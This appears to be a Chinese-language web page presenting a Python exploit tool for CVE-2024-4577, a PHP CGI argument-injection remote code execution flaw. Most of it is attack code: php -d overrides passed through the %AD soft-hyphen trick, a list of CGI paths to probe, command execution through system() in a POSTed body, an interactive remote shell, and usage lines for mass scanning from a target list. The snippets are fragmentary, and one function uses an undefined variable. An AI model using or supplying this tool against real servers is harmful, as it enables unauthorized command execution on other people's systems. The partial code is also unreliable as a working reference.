PHP CGI模块8.3.4远程代码执行漏洞

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

#!/usr/bin/env python3

import re
import sys
import base64
import requests
import argparse
from rich.console import Console
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed

disable_warnings(InsecureRequestWarning)

console = Console()

class PHPCGIExploit:
    """CVE-2024-4577 PHP CGI参数注入RCE利用工具"""
    
    def __init__(self):
        self.headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        }
        
        # PHP CGI参数注入优化设置
        self.php_settings = [
            "-d cgi.force_redirect=0",
            "-d cgi.redirect_status_env=0",
            "-d fastcgi.impersonate=1",
            "-d open_basedir=",
            "-d disable_functions=",
            "-d auto_prepend_file=php://input",
            "-d allow_url_include=1",
            "-d allow_url_fopen=1"
        ]
        
        # Windows系统的软连字符
        self.soft_hyphen = "%AD"  # 0xAD字符
        
        # 尝试的PHP CGI路径
        self.cgi_paths = [
            "/php-cgi/php-cgi.exe",
            "/php/php-cgi.exe",
            "/cgi-bin/php-cgi.exe",
            "/php-cgi.exe",
            "/php.exe",
            "/php/php.exe"
        ]

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

def check_vulnerability(self, target):
    """检查目标是否易受攻击"""
    console.print(f"[blue][*][/blue] 测试目标: {target}")
    
    # 使用简单命令测试
    result, cgi_path = self.execute_command(target, "echo CVE-2024-4577-TEST")
    
    if result and "CVE-2024-4577-TEST" in result:
        console.print(f"[green][+][/green] 目标存在漏洞! CGI路径: {cgi_path}")
        return True, cgi_path
    else:
        console.print(f"[red][-][/red] 目标不存在漏洞")
        return False, None

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

def execute_command(self, target, command="whoami", cgi_path=None):
    """使用PHP CGI参数注入在目标上执行命令"""
    try:
        # 创建PHP代码
        php_code = f"""<?php
error_reporting(0);
echo '[START]';
system('{command}');
echo '[END]';
die();
?>"""
        
        # 构建payload URL
        payload_url = self.build_payload_url(path)
        full_url = f"{target.rstrip('/')}{payload_url}"
        
        response = requests.post(
            full_url,
            headers=self.headers,
            data=php_code,
            timeout=10,
            verify=False,
            allow_redirects=False
        )

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

def interactive_shell(self, target, cgi_path):
    """交互式Shell会话 - 简化版本"""
    console.print("[green][+][/green] 交互式Shell已开启")
    console.print("[yellow][!][/yellow] 输入'exit'退出，'clear'清屏")
    
    while True:
        try:
            cmd = input("shell> ")
            
            if cmd.lower() == "exit":
                break
            elif cmd.lower() == "clear":
                print("\033[2J\033[H", end="")
                continue
                
            # 执行命令
            result, _ = self.execute_command(target, cmd, cgi_path)
            
            if result:
                print(result)
            else:
                console.print("[red][-][/red] 命令执行失败")

1

python3 exploit.py -u http://target.com

1

python3 exploit.py -f targets.txt -t 10 -o results.txt